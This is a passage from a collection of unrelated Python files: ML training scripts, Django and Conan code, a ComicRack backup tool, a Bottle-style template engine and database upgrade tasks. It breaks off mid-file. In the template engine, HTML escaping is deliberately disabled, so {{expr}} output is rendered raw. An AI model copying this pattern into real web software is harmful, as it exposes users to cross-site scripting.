'''
Quick sanity tests on the functions' output dimensions -- just an assert to be sure
'''
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as skt
from src.Activation.sigmoid import Sigmoid
from src.Activation.softmax import Softmax
from src.Loss.CESoftMax import CESoftMax
from src.Module.linear import Linear
from src.Module.sequential import Sequential
from src.Optim.optim import Optim
from src.utils.utils import load_usps, transform_numbers
def test_multiclass():
"""
testx, testy = get_usps([neg, pos], alltestx, alltesty)
testy = np.where(testy == neg, -1, 1)
:return:
"""
uspsdatatrain = "data/USPS_train.txt"
uspsdatatest = "data/USPS_test.txt"
alltrainx, alltrainy = load_usps(uspsdatatrain)
alltestx, alltesty = load_usps(uspsdatatest)
validation_size = 500
allvalx = alltestx[:validation_size]
allvaly = alltesty[:validation_size]
alltestx = alltestx[validation_size:]
alltesty = alltesty[validation_size:]
input_size = len(alltrainx[0])
output_size = len(np.unique(alltesty))
alltrainy_proba = transform_numbers(alltrainy, output_size)
# Initialize modules with respective size
iteration = 1000
gradient_step = 1e-3
arbitrary_neural = 128
batch_size = 25 # len(alltrainx)
m_linear = Linear(input_size, arbitrary_neural)
m_act1 = Sigmoid()
m_linear2 = Linear(arbitrary_neural, output_size)
m_act2 = Softmax()
m_loss = CESoftMax()
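    # Note: Softmax is deliberately left out of the Sequential below; CESoftMax
    # is expected to apply the softmax inside the loss, so the network trains on
    # raw logits and m_act2 is only applied at prediction time.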
seq = Sequential([m_linear, m_act1, m_linear2])
opt = Optim(seq, loss=m_loss, eps=gradient_step)
opt.SGD(alltrainx, alltrainy_proba, batch_size, X_val=allvalx, Y_val=allvaly, f_val=lambda x: np.argmax(x, axis=1),
maxiter=iteration, verbose=2)
predict = m_act2.forward(opt.predict(alltestx))
predict = np.argmax(predict, axis=1)
    # sklearn's convention is confusion_matrix(y_true, y_pred)
    res = skt.confusion_matrix(alltesty, predict)
    print(np.sum(np.where(predict == alltesty, 1, 0)) / len(predict))
    plt.imshow(res)
    plt.show()
if __name__ == '__main__':
test_multiclass()
|
from discord.ext import commands
class SubcommandIsNone(commands.CommandError):
"""
    Raised when the user did not specify a subcommand from a command group
"""
def __init__(self, commands_group):
self.commands_group = commands_group
class CogImportError(commands.CommandError):
"""
    Raised when an error occurs while loading/unloading/reloading a cog
"""
def __init__(self, error_text):
self.error_text = error_text
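# Hypothetical usage sketch (names assumed, not part of the original module):
# raise these from commands and turn them into user-facing messages in a
# global error handler, e.g.:
#
# @bot.event
# async def on_command_error(ctx, error):
#     if isinstance(error, SubcommandIsNone):
#         await ctx.send('Please specify a subcommand of %s.' % error.commands_group)
#     elif isinstance(error, CogImportError):
#         await ctx.send(error.error_text)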
|
# Generated by Django 2.2.4 on 2020-03-22 11:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("budget", "0009_quartertotal")]
operations = [
migrations.RemoveField(model_name="quartertotal", name="amount_pln"),
migrations.AlterField(
model_name="quartertotal",
name="amount_gbp",
field=models.DecimalField(decimal_places=2, default=0, max_digits=8),
),
migrations.AlterField(
model_name="quartertotal",
name="amount_safe",
field=models.DecimalField(decimal_places=2, default=0, max_digits=8),
),
migrations.AlterField(
model_name="quartertotal",
name="amount_usd",
field=models.DecimalField(decimal_places=2, default=0, max_digits=8),
),
]
|
import subprocess
import os
import tempfile
def importer(filename, type):
    contents = ''
    with tempfile.TemporaryDirectory() as tmpdir:
        # both supported formats go through the same tesseract call
        if type in ('png', 'jpg'):
            path = tmpdir + '/out'
            # run tesseract, discarding its stderr chatter
            with open(os.devnull, "w") as redirected_output_file:
                subprocess.call(['tesseract', filename, path], stderr=redirected_output_file)
            with open(path + '.txt', 'r') as output_file:
                contents = output_file.read()
    return contents
# test run:
# UwU = importer('../test_files/test.png', 'png')
# print(UwU)
|
import unittest
from conans.test.utils.tools import TestClient
from conans.paths import CONANINFO
from conans.util.files import load
import os
class OptionTest(unittest.TestCase):
def parsing_test(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class EqualerrorConan(ConanFile):
name = "equal"
version = "1.0.0"
options = {"opt": "ANY"}
def build(self):
self.output.warn("OPTION %s" % self.options.opt)
'''
client.save({"conanfile.py": conanfile})
client.run("export user/testing")
conanfile = '''
[requires]
equal/1.0.0@user/testing
[options]
equal:opt=a=b
'''
client.save({"conanfile.txt": conanfile}, clean_first=True)
client.run("install . --build=missing")
self.assertIn("OPTION a=b", client.user_io.out)
def basic_test(self):
client = TestClient()
zlib = '''
from conans import ConanFile
class ConanLib(ConanFile):
name = "zlib"
version = "0.1"
options = {"shared": [True, False]}
default_options= "shared=False"
'''
client.save({"conanfile.py": zlib})
client.run("export lasote/testing")
project = """[requires]
zlib/0.1@lasote/testing
"""
client.save({"conanfile.txt": project}, clean_first=True)
client.run("install -o zlib:shared=True --build=missing")
self.assertIn("zlib/0.1@lasote/testing:2a623e3082a38f90cd2c3d12081161412de331b0",
client.user_io.out)
conaninfo = load(os.path.join(client.current_folder, CONANINFO))
self.assertIn("zlib:shared=True", conaninfo)
# Options not cached anymore
client.run("install --build=missing")
self.assertIn("zlib/0.1@lasote/testing:5ab84d6acfe1f23c4fae0ab88f26e3a396351ac9",
client.user_io.out)
conaninfo = load(os.path.join(client.current_folder, CONANINFO))
self.assertNotIn("zlib:shared=True", conaninfo)
|
'''
Created on 2013-4-21
@author: Xsank
'''
import os
import re
import tokenize
from exception import TemplateError
from util import tou,abort,html_escape
from config import TEMPLATES,TEMPLATE_PATH,DEBUG
class BaseTemplate(object):
    extensions = ['tpl', 'html']
settings = {}
defaults = {}
def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings):
self.name = name
self.source = source.read() if hasattr(source, 'read') else source
self.filename = source.filename if hasattr(source, 'filename') else None
self.lookup = map(os.path.abspath, lookup)
self.encoding = encoding
self.settings = self.settings.copy()
self.settings.update(settings)
if not self.source and self.name:
self.filename = self.search(self.name, self.lookup)
if not self.filename:
raise TemplateError('Template %s not found.' % repr(name))
if not self.source and not self.filename:
raise TemplateError('No template specified.')
self.prepare(**self.settings)
@classmethod
def search(cls, name, lookup=[]):
if os.path.isfile(name): return name
for spath in lookup:
fname = os.path.join(spath, name)
if os.path.isfile(fname):
return fname
            for ext in cls.extensions:
if os.path.isfile('%s.%s' % (fname, ext)):
return '%s.%s' % (fname, ext)
@classmethod
def global_config(cls, key, *args):
if args:
cls.settings[key] = args[0]
else:
return cls.settings[key]
def prepare(self, **options):
raise NotImplementedError
def render(self, **args):
raise NotImplementedError
class SimpleTemplate(BaseTemplate):
blocks = ('if','elif','else','try','except','finally','for','while','with','def','class')
dedent_blocks = ('elif', 'else', 'except', 'finally')
def prepare(self, escape_func=html_escape, noescape=False):
self.cache = {}
if self.source:
self.code = self.translate(self.source)
self.co = compile(self.code, '<string>', 'exec')
else:
self.code = self.translate(open(self.filename).read())
self.co = compile(self.code, self.filename, 'exec')
enc = self.encoding
self._str = lambda x: tou(x, enc)
        #html escaping via escape_func is intended here, but it broke
        #rendering, so escaping is disabled for now:
        #self._escape = lambda x: escape_func(tou(x, enc))
        self._escape = lambda x: tou(x, enc)
if noescape:
self._str, self._escape = self._escape, self._str
def translate(self, template):
stack = []
lineno = 0
ptrbuffer = []
codebuffer = []
        oneline = multiline = dedent = False
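        # yield_tokens splits a template line on {{...}} markers: parts at odd
        # indices are inline expressions -- '{{!expr}}' yields ('RAW', expr),
        # rendered unescaped, and '{{expr}}' yields ('CMD', expr), rendered
        # escaped -- while even-indexed parts are plain text ('TXT').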
def yield_tokens(line):
for i, part in enumerate(re.split(r'\{\{(.*?)\}\}', line)):
if i % 2:
if part.startswith('!'): yield 'RAW', part[1:]
else: yield 'CMD', part
else: yield 'TXT', part
def split_comment(codeline):
line = codeline.splitlines()[0]
try:
tokens = list(tokenize.generate_tokens(iter(line).next))
except tokenize.TokenError:
return line.rsplit('#',1) if '#' in line else (line, '')
for token in tokens:
if token[0] == tokenize.COMMENT:
start, end = token[2][1], token[3][1]
return codeline[:start] + codeline[end:], codeline[start:end]
return line, ''
def flush():
if not ptrbuffer: return
cline = ''
for line in ptrbuffer:
for token, value in line:
if token == 'TXT': cline += repr(value)
elif token == 'RAW': cline += '_str(%s)' % value
elif token == 'CMD': cline += '_escape(%s)' % value
cline += ', '
cline = cline[:-2] + '\\\n'
cline = cline[:-2]
if cline[:-1].endswith('\\\\\\\\\\n'):
cline = cline[:-7] + cline[-1]
cline = '_printlist([' + cline + '])'
del ptrbuffer[:]
code(cline)
def code(stmt):
for line in stmt.splitlines():
codebuffer.append(' ' * len(stack) + line.strip())
for line in template.splitlines(True):
lineno += 1
line = line if isinstance(line, unicode)\
else unicode(line, encoding=self.encoding)
if lineno <= 2:
m = re.search(r"%.*coding[:=]\s*([-\w\.]+)", line)
if m: self.encoding = m.group(1)
if m: line = line.replace('coding','coding (removed)')
if line.strip()[:2].count('%') == 1:
line = line.split('%',1)[1].lstrip()
cline = split_comment(line)[0].strip()
cmd = re.split(r'[^a-zA-Z0-9_]', cline)[0]
flush()
if cmd in self.blocks or multiline:
cmd = multiline or cmd
dedent = cmd in self.dedent_blocks
if dedent and not oneline and not multiline:
cmd = stack.pop()
code(line)
oneline = not cline.endswith(':')
multiline = cmd if cline.endswith('\\') else False
if not oneline and not multiline:
stack.append(cmd)
elif cmd == 'end' and stack:
code('#end(%s) %s' % (stack.pop(), line.strip()[3:]))
elif cmd == 'include':
p = cline.split(None, 2)[1:]
if len(p) == 2:
code("_=_include(%s, _stdout, %s)" % (repr(p[0]), p[1]))
elif p:
code("_=_include(%s, _stdout)" % repr(p[0]))
else:
code("_printlist(_base)")
elif cmd == 'rebase':
p = cline.split(None, 2)[1:]
if len(p) == 2:
code("globals()['_rebase']=(%s, dict(%s))" % (repr(p[0]), p[1]))
elif p:
code("globals()['_rebase']=(%s, {})" % repr(p[0]))
else:
code(line)
else:
if line.strip().startswith('%%'):
line = line.replace('%%', '%', 1)
ptrbuffer.append(yield_tokens(line))
flush()
return '\n'.join(codebuffer) + '\n'
def subtemplate(self, _name, _stdout, **args):
if _name not in self.cache:
self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
return self.cache[_name].execute(_stdout, **args)
def execute(self, _stdout, **args):
#_stdout change the html code
env = self.defaults.copy()
env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
'_include': self.subtemplate, '_str': self._str,
'_escape': self._escape})
env.update(args)
eval(self.co, env)
if '_rebase' in env:
subtpl, rargs = env['_rebase']
subtpl = self.__class__(name=subtpl, lookup=self.lookup)
rargs['_base'] = _stdout[:]
del _stdout[:]
return subtpl.execute(_stdout, **rargs)
return env
def render(self, **args):
stdout = []
try:
#execute error
self.execute(stdout, **args)
except Exception,e:
print e
finally:
return ''.join(stdout)
def template(tpl, template_adapter=SimpleTemplate, **kwargs):
if tpl not in TEMPLATES or DEBUG:
settings = kwargs.get('template_settings',{})
lookup = kwargs.get('template_lookup', TEMPLATE_PATH)
if isinstance(tpl, template_adapter):
TEMPLATES[tpl] = tpl
if settings: TEMPLATES[tpl].prepare(**settings)
elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
TEMPLATES[tpl] = template_adapter(source=tpl, lookup=lookup, **settings)
else:
TEMPLATES[tpl] = template_adapter(name=tpl, lookup=lookup, **settings)
if not TEMPLATES[tpl]:
abort(500, 'Template (%s) not found' % tpl)
return TEMPLATES[tpl].render(**kwargs)
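# Hypothetical usage sketch (assuming TEMPLATE_PATH is configured):
# html = template('Hello {{name}}!', name='world')   # inline template source
# page = template('index', name='world')             # template looked up on disk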
|
#import sys
#input = sys.stdin.readline
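# Stack-based scan: repeatedly delete every occurrence of the substring "fox"
# from S. ANS acts as the stack and t tracks its height; when an 'x' arrives
# on top of 'f', 'o', all three characters are dropped.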
def main():
N = int(input())
S = list(input())
ANS = []
t = 0
for s in S:
# print(t, ANS)
if t <= 1:
ANS.append(s)
t += 1
continue
if s != "x":
ANS.append(s)
t += 1
continue
if ANS[-1] == "o" and ANS[-2] == "f":
t -= 2
ANS.pop()
ANS.pop()
else:
ANS.append(s)
t += 1
print(len(ANS))
if __name__ == '__main__':
main()
|
list1 = list(range(1, 31))
print(list1)
print('------------------------------\n')
print('\n'.join([' '.join('%d*%d=%d' % (x,y,x*y) for x in range(1,y+1)) for y in range(1,10)]))
print('-------------------------------\n')
list2 = [x*x for x in range(1,11)]
print(list2)
print('-------------------------------\n')
list3 = [x*x for x in range(1,11) if x % 2 == 0]
print(list3)
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
#return HttpResponse("<em>My Second App</em>")
my_dict = {"insert_me" : "Hello, I am from views.py - I am the index page!",
"title" : "Index Page"}
return render(request, 'AppTwo/index.html', context=my_dict)
def help(request):
my_dict = {"help_me" : "Hello, I am also from views.py - but I am the help page!",
"title": "Help Page"}
    return render(request, 'AppTwo/help.html', context=my_dict)
|
#!/usr/bin/env python
# encoding: utf-8
import unittest
import simulator.tests.mm1 as mm1
import simulator.tests.sim as sim
# Run tests
# 1. MM1EventHandler class
unittest.TextTestRunner(verbosity=2).run(
unittest.TestLoader().loadTestsFromTestCase(mm1.MM1EventHandlerTests))
# 2. SimulatorEngine class
unittest.TextTestRunner(verbosity=2).run(
unittest.TestLoader().loadTestsFromTestCase(sim.SimulationEngineTests))
# 3. Event class
unittest.TextTestRunner(verbosity=2).run(
unittest.TestLoader().loadTestsFromTestCase(sim.EventTests))
|
#!/usr/bin/env python
iwconf_file = open('iwcfg.txt', 'r+')
iwconf = iwconf_file.readlines()
iwconf_file.close()
link_quality = ""
signal = ""
for line in iwconf:
if line.find("Link Quality") > -1:
link_quality = line[23:25]
signal = line[43:46]
link_quality = str(float(link_quality)/70)
print "Link Quality: " + link_quality
print "Signal: " + signal
wlan0_output = open('wlan0_output.txt', 'a+')
wlan0_output.write(signal+","+link_quality+"\n")
wlan0_output.close()
|
'''
Backup Manager for ComicRack
bmUtils.py - utility classes for the Backup Manager
Copyright 2013 docdoom
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ionic zip library used with permission from http://dotnetzip.codeplex.com
Icons and images used with permission from http://jonasraskdesign.com
'''
import clr
import System.Windows.Forms
from System.Windows.Forms import *
import datetime
import System.IO
from System.IO import Path, FileInfo, File, Directory
clr.AddReference('Ionic.Zip')
from Ionic.Zip import *
FOLDER = FileInfo(__file__).DirectoryName + '\\'
INIFILE = Path.Combine(FOLDER, 'backupMan.ini')
ICONLARGE = Path.Combine(FOLDER, 'backupManLarge.png')
FILENUMBERWARNING = 100 # threshold of backup file count
class backupManagerUtils:
def __init__(self):
pass
def setBackupFolder(self):
ini = iniFile()
dialog = FolderBrowserDialog()
dialog.Description = 'The Backup Manager for ComicRack\n\nPlease select where to store your backups'
root = ini.getValue(INIFILE,'backupFolder')
version = ini.getValue(INIFILE, 'Version')
        if str.Trim(root) != '':
dialog.SelectedPath = root
else:
dialog.RootFolder = System.Environment.SpecialFolder.Desktop
if dialog.ShowDialog() == DialogResult.OK:
ini.writeIni(INIFILE,'backupFolder',dialog.SelectedPath)
return True
else:
return False
def do_the_backup(self, FULLBACKUP = False, SHOWRESULT = False):
ini = iniFile()
version = ini.getValue(INIFILE, 'Version')
msgBoxTitle = 'Backup Manager for ComicRack %s' % version
backupFolder = ''
if not File.Exists(INIFILE):
self.setBackupFolder()
else:
backupFolder = ini.getValue(INIFILE,'backupFolder')
if str.Trim(backupFolder) == '':
return self.setBackupFolder()
elif not Directory.Exists(backupFolder):
MessageBox.Show('The path for your backup is not valid. Please configure!', msgBoxTitle)
return self.setBackupFolder()
else:
if Directory.GetFiles(backupFolder,'ComicDB*.zip').Length > FILENUMBERWARNING:
MessageBox.Show('There are a lot of backup files in your backupfolder.\nYou should consider a clean-up', msgBoxTitle)
now = datetime.datetime.now()
myAppDataFolder = System.Environment.ExpandEnvironmentVariables('%appdata%') + '\\'
myAppDataFolder = Path.Combine(myAppDataFolder,'cyo\\ComicRack') + '\\'
myThumbnailFolder = System.Environment.ExpandEnvironmentVariables('%LOCALAPPDATA%') + r'\cyo\ComicRack\cache\CustomThumbnails'
myDBFile = Path.Combine(myAppDataFolder,'ComicDB.xml')
myConfigXML = Path.Combine(myAppDataFolder,'config.xml')
myDate = now
currentDate = myDate.strftime("%Y-%m-%d_%H%M%S")
zipfile = ZipFile()
if not File.Exists(myDBFile):
MessageBox.Show('I could not find your library file. Please post this error.', msgBoxTitle)
else:
if not Directory.Exists(backupFolder):
Directory.CreateDirectory(backupFolder)
if FULLBACKUP == True:
myBackup = backupFolder + '\\ComicDB Full Backup %s.zip' % currentDate
zipfile.AddDirectory(myAppDataFolder, myAppDataFolder)
zipfile.AddDirectory(myThumbnailFolder, myThumbnailFolder)
else:
myBackup = backupFolder + '\\ComicDB Backup %s.zip' % currentDate
zipfile.AddFile(myDBFile,'')
zipfile.AddDirectory(myThumbnailFolder, 'Thumbnails')
zipfile.Save(myBackup)
            if SHOWRESULT == True:
                if File.Exists(myBackup):
                    MessageBox.Show('Backup saved as \n%s' % myBackup, msgBoxTitle)
                    ini.writeIni(INIFILE,'LastBackupTime', myDate.strftime("%Y-%m-%d %H:%M:%S"))
else:
MessageBox.Show('No backup file was saved. Something unexpected must have happened ...', msgBoxTitle)
return True
class iniFile:
def __init__(self):
pass
def writeIni(self, theFile, myKey, myVal):
'''
writes the key myKey and value myVal to the ini-file
'''
if File.Exists(theFile):
linefound = False
newConfig = []
myLines = File.ReadAllLines(theFile)
for line in myLines:
s = str.split(line,'=')
if str.lower(str.Trim(s[0])) == str.lower(myKey):
line = '%s = %s' % (myKey, myVal)
linefound = True
newConfig.append(line)
            if not linefound:
newConfig.append('%s = %s' % (myKey, myVal))
File.WriteAllLines(theFile,newConfig)
else:
File.AppendAllText(theFile,'%s = %s%s' % (myKey, myVal, System.Environment.NewLine))
return
def getValue(self, theFile, myKey):
'''
retrieves the value of myKey in Ini-file theFile
'''
if File.Exists(theFile):
myLines = File.ReadAllLines(theFile)
for line in myLines:
s = str.split(line,'=')
if str.Trim(s[0]) == myKey:
return str.Trim(s[1])
return ''
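# Hypothetical usage sketch (not part of the original script):
# ini = iniFile()
# ini.writeIni(INIFILE, 'backupFolder', 'D:\\Backups')
# folder = ini.getValue(INIFILE, 'backupFolder')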
|
import tensorflow as tf
import numpy as np
import os
from tensorflow import keras
from tensorflow.keras import layers
from PIL import Image
from matplotlib import pyplot as plt
tf.random.set_seed(22)
np.random.seed(22)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# the per-epoch reconstruction images are written here
os.makedirs('ae_images', exist_ok=True)
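# save_image tiles 100 28x28 grayscale frames into a single 10x10 contact sheet.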
def save_image(imgs, name):
new_im = Image.new('L', (280, 280))
index = 0
for i in range(0, 280, 28):
for j in range(0, 280, 28):
im = imgs[index]
im = Image.fromarray(im, mode='L')
new_im.paste(im, (i, j))
index += 1
new_im.save(name)
h_dim = 20
batch_size = 512
learning_rate = 1e-3
(x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()
x_train, x_test = x_train.astype(np.float32) / 255., x_test.astype(np.float32) / 255.
train_db = tf.data.Dataset.from_tensor_slices(x_train)
train_db = train_db.shuffle(batch_size * 5).batch(batch_size)
test_db = tf.data.Dataset.from_tensor_slices(x_test)
test_db = test_db.batch(batch_size)
print(x_train.shape, x_test.shape)
class AE(keras.Model):
def __init__(self):
super(AE, self).__init__()
# encoder
self.encoder = keras.Sequential(
[
layers.Dense(256, activation=tf.nn.relu),
layers.Dense(128, activation=tf.nn.relu),
layers.Dense(h_dim, ),
]
)
# decoder
self.decoder = keras.Sequential([
layers.Dense(128, activation=tf.nn.relu),
layers.Dense(256, activation=tf.nn.relu),
layers.Dense(784),
])
def call(self, inputs, training=None):
        # b, 784 --> b, h_dim
x = self.encoder(inputs)
        # b, h_dim --> b, 784
x_hat = self.decoder(x)
return x_hat
model = AE()
model.build(input_shape=(None, 784))
model.summary()
optim = keras.optimizers.Adam(learning_rate)
for epoch in range(100):
for step, x in enumerate(train_db):
# b, 28, 28
x = tf.reshape(x, [-1, 784])
with tf.GradientTape() as tape:
x_rec_logits = model(x)
rec_loss = tf.losses.binary_crossentropy(x, x_rec_logits, from_logits=True)
rec_loss = tf.reduce_mean(rec_loss)
grads = tape.gradient(rec_loss, model.trainable_variables)
optim.apply_gradients(zip(grads, model.trainable_variables))
if step % 100 == 0:
print(epoch, step, float(rec_loss))
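    # end of epoch: reconstruct one held-out batch and save the originals and
    # their reconstructions side by side as an image grid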
x = next(iter(test_db))
# x = tf.reshape(x, [-1, 784])
logits = model(tf.reshape(x, [-1, 784]))
x_hat = tf.nn.sigmoid(logits)
x_hat = tf.reshape(x_hat, [-1, 28, 28])
x_concat = tf.concat([x, x_hat], axis=0)
x_concat = x_concat.numpy() * 255.
x_concat = x_concat.astype(np.uint8)
    save_image(x_concat, 'ae_images/rec_epoch_%d.png' % epoch)
|
""" Contains upgrade tasks that are executed when the application is being
upgraded on the server. See :class:`onegov.core.upgrade.upgrade_task`.
"""
from onegov.core.orm.types import HSTORE
from onegov.core.orm.types import JSON
from onegov.core.orm.types import UTCDateTime
from onegov.core.upgrade import upgrade_task
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import Enum
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import Numeric
from sqlalchemy import Text
from sqlalchemy.engine.reflection import Inspector
def alter_domain_of_influence(context, old, new):
# see http://stackoverflow.com/a/14845740
# Todo: Check if old exists
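    # Recipe (see the link above): create a temporary enum with the new values,
    # cast the affected columns over to it, drop the old type, recreate it
    # under the original name, cast the columns back, and drop the temporary.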
old_type = Enum(*old, name='domain_of_influence')
# Change current types to a temporary one
tmp_type = Enum(*new, name='_domain_of_influence')
tmp_type.create(context.operations.get_bind(), checkfirst=False)
inspector = Inspector(context.operations_connection)
tables = ['elections', 'election_compounds', 'votes', 'archived_results']
for table in tables:
if table in inspector.get_table_names(context.schema):
context.operations.execute(
f'ALTER TABLE {table} '
f'ALTER COLUMN domain TYPE _domain_of_influence '
f'USING domain::text::_domain_of_influence'
)
# Drop old one
old_type.drop(context.operations.get_bind(), checkfirst=False)
# Change temporary to new one with the right name
new_type = Enum(*new, name='domain_of_influence')
new_type.create(context.operations.get_bind(), checkfirst=False)
for table in tables:
context.operations.execute(
f'ALTER TABLE {table} '
f'ALTER COLUMN domain TYPE domain_of_influence '
f'USING domain::text::domain_of_influence'
)
# Drop temporary
tmp_type.drop(context.operations.get_bind(), checkfirst=False)
@upgrade_task('Rename yays to yeas')
def rename_yays_to_yeas(context):
if not context.has_column('ballot_results', 'yeas'):
context.operations.alter_column(
'ballot_results', 'yays', new_column_name='yeas'
)
@upgrade_task('Add shortcode column')
def add_shortcode_column(context):
if not context.has_column('votes', 'shortcode'):
context.operations.add_column('votes', Column('shortcode', Text()))
@upgrade_task('Enable translation of vote title')
def enable_translation_of_vote_title(context):
if context.has_column('votes', 'title'):
context.operations.drop_column('votes', 'title')
if not context.has_column('votes', 'title_translations'):
context.operations.add_column('votes', Column(
'title_translations', HSTORE, nullable=False
))
@upgrade_task('Add absolute majority column')
def add_absolute_majority_column(context):
if not context.has_column('elections', 'absolute_majority'):
context.operations.add_column(
'elections',
Column('absolute_majority', Integer())
)
@upgrade_task('Add meta data')
def add_meta_data_columns(context):
if not context.has_column('elections', 'meta'):
context.operations.add_column('elections', Column('meta', JSON()))
if not context.has_column('votes', 'meta'):
context.operations.add_column('votes', Column('meta', JSON()))
@upgrade_task('Add municipality domain of influence')
def add_municipality_domain(context):
# Rename the columns
renames = (
('elections', 'total_municipalities', 'total_entities'),
('elections', 'counted_municipalities', 'counted_entities'),
('election_results', 'municipality_id', 'entity_id'),
('ballot_results', 'municipality_id', 'entity_id'),
)
for table, old, new in renames:
if context.has_column(table, old):
context.operations.alter_column(table, old, new_column_name=new)
# Add the new domain,
alter_domain_of_influence(
context,
['federation', 'canton'],
['federation', 'canton', 'municipality']
)
@upgrade_task('Add party resuts columns')
def add_party_results_columns(context):
if not context.has_column('party_results', 'color'):
context.operations.add_column(
'party_results',
Column('color', Text())
)
if not context.has_column('party_results', 'year'):
context.operations.add_column(
'party_results',
Column('year', Integer())
)
if not context.has_column('party_results', 'total_votes'):
context.operations.add_column(
'party_results',
Column('total_votes', Integer())
)
@upgrade_task('Add status')
def add_status_columns(context):
if not context.has_column('elections', 'status'):
context.operations.add_column(
'elections',
Column(
'status',
Enum(
'unknown',
'interim',
'final',
name='election_or_vote_status'
),
nullable=True
)
)
if not context.has_column('votes', 'status'):
context.operations.add_column(
'votes',
Column(
'status',
Enum(
'unknown',
'interim',
'final',
name='election_or_vote_status'
),
nullable=True
)
)
@upgrade_task('Add party to candidate')
def add_candidate_party_column(context):
for table in ['candidates', 'candiates']:
if context.has_table(table):
if not context.has_column(table, 'party'):
context.operations.add_column(
table,
Column('party', Text, nullable=True)
)
@upgrade_task('Rename candidates tables')
def rename_candidates_tables(context):
for old_name, new_name in (
('candiate_results', 'candidate_results'),
('candiates', 'candidates'),
):
if context.has_table(old_name):
if context.has_table(new_name):
context.operations.drop_table(new_name)
context.operations.rename_table(old_name, new_name)
@upgrade_task('Adds ballot title')
def add_ballot_title(context):
if not context.has_column('ballots', 'title_translations'):
context.operations.add_column('ballots', Column(
'title_translations', HSTORE, nullable=True
))
@upgrade_task('Add content columns')
def add_content_columns(context):
if not context.has_column('elections', 'content'):
context.operations.add_column('elections', Column('content', JSON))
if not context.has_column('votes', 'content'):
context.operations.add_column('votes', Column('content', JSON))
@upgrade_task('Add vote type column')
def add_vote_type_column(context):
if not context.has_column('votes', 'type'):
context.operations.add_column('votes', Column('type', Text))
@upgrade_task('Change election type column')
def change_election_type_column(context):
type_ = Enum('proporz', 'majorz', name='type_of_election')
context.operations.execute(
'ALTER TABLE elections ALTER COLUMN type TYPE Text'
)
type_.drop(context.operations.get_bind(), checkfirst=False)
@upgrade_task('Replaces results group with name and district')
def replace_results_group(context):
for table in ('ballot_results', 'election_results'):
if (
context.has_column(table, 'group')
and not context.has_column(table, 'name')
):
context.operations.alter_column(
table, 'group', new_column_name='name'
)
if not context.has_column(table, 'district'):
context.operations.add_column(
table, Column('district', Text, nullable=True)
)
@upgrade_task('Change counted columns of elections')
def change_counted_columns_of_elections(context):
if not context.has_column('election_results', 'counted'):
context.operations.add_column(
'election_results', Column(
'counted', Boolean, nullable=False, server_default='TRUE'
)
)
if context.has_column('elections', 'total_entities'):
context.operations.drop_column('elections', 'total_entities')
if context.has_column('elections', 'counted_entities'):
context.operations.drop_column('elections', 'counted_entities')
@upgrade_task(
'Add region domain of influence',
requires='onegov.ballot:Add municipality domain of influence',
)
def add_region_domain(context):
alter_domain_of_influence(
context,
['federation', 'canton', 'municipality'],
['federation', 'region', 'canton', 'municipality'],
)
@upgrade_task('Rename eligible voters columns')
def rename_eligible_voters_columns(context):
tables = (
'elections', 'election_results', 'ballots', 'ballot_results', 'votes'
)
for table in tables:
if context.has_column(table, 'elegible_voters'):
context.operations.alter_column(
table, 'elegible_voters', new_column_name='eligible_voters'
)
@upgrade_task('Add party results to compounds')
def add_party_results_to_compounds(context):
if context.has_column('party_results', 'election_id'):
context.operations.drop_constraint(
'party_results_election_id_fkey',
'party_results',
type_='foreignkey'
)
context.operations.alter_column(
'party_results',
'election_id',
new_column_name='owner'
)
@upgrade_task('Add panachage results to compounds')
def add_panachage_results_to_compounds(context):
if not context.has_column('panachage_results', 'owner'):
context.operations.add_column(
'panachage_results',
Column('owner', Text())
)
if context.has_column('panachage_results', 'source_list_id'):
context.operations.alter_column(
'panachage_results',
'source_list_id',
new_column_name='source'
)
if context.has_column('panachage_results', 'target_list_id'):
context.operations.drop_constraint(
'panachage_results_target_list_id_fkey',
'panachage_results',
type_='foreignkey'
)
context.operations.execute(
'ALTER TABLE panachage_results '
'ALTER COLUMN target_list_id TYPE Text'
)
context.operations.alter_column(
'panachage_results',
'target_list_id',
new_column_name='target'
)
@upgrade_task(
'Add update contraints',
requires='onegov.ballot:Rename candidates tables',
)
def add_update_constraints(context):
# We use SQL (rather than operations.xxx) so that we can drop and add
# the constraints in one statement
for ref, table in (
('vote', 'ballots'),
# ('election', 'candidates'),
('election', 'election_results'),
('election', 'list_connections'),
('election', 'lists'),
):
context.operations.execute(
f'ALTER TABLE {table} '
f'DROP CONSTRAINT {table}_{ref}_id_fkey, '
f'ADD CONSTRAINT {table}_{ref}_id_fkey'
f' FOREIGN KEY ({ref}_id) REFERENCES {ref}s (id)'
f' ON UPDATE CASCADE'
)
# there was a typo
context.operations.execute(
'ALTER TABLE candidates '
'DROP CONSTRAINT IF EXISTS candiates_election_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidates_election_id_fkey, '
'ADD CONSTRAINT candidates_election_id_fkey'
' FOREIGN KEY (election_id) REFERENCES elections (id)'
' ON UPDATE CASCADE'
)
@upgrade_task('Migrate election compounds')
def migrate_election_compounds(context):
if context.has_column('election_compounds', 'elections'):
context.operations.drop_column('election_compounds', 'elections')
@upgrade_task('Adds a default majority type')
def add_default_majority_type(context):
# Removed data migrations
pass
@upgrade_task('Add delete contraints')
def add_delete_constraints(context):
# We use SQL (rather than operations.xxx) so that we can drop and add
# the constraints in one statement
for table, ref, update, delete in (
# ('candidate_results', 'candidate', False, True), # see below
# ('candidate_results', 'election_result', False, True), # see below
('candidates', 'election', True, True),
# ('candidates', 'list', False, True), # see below
('election_results', 'election', True, True),
('list_connections', 'election', True, True),
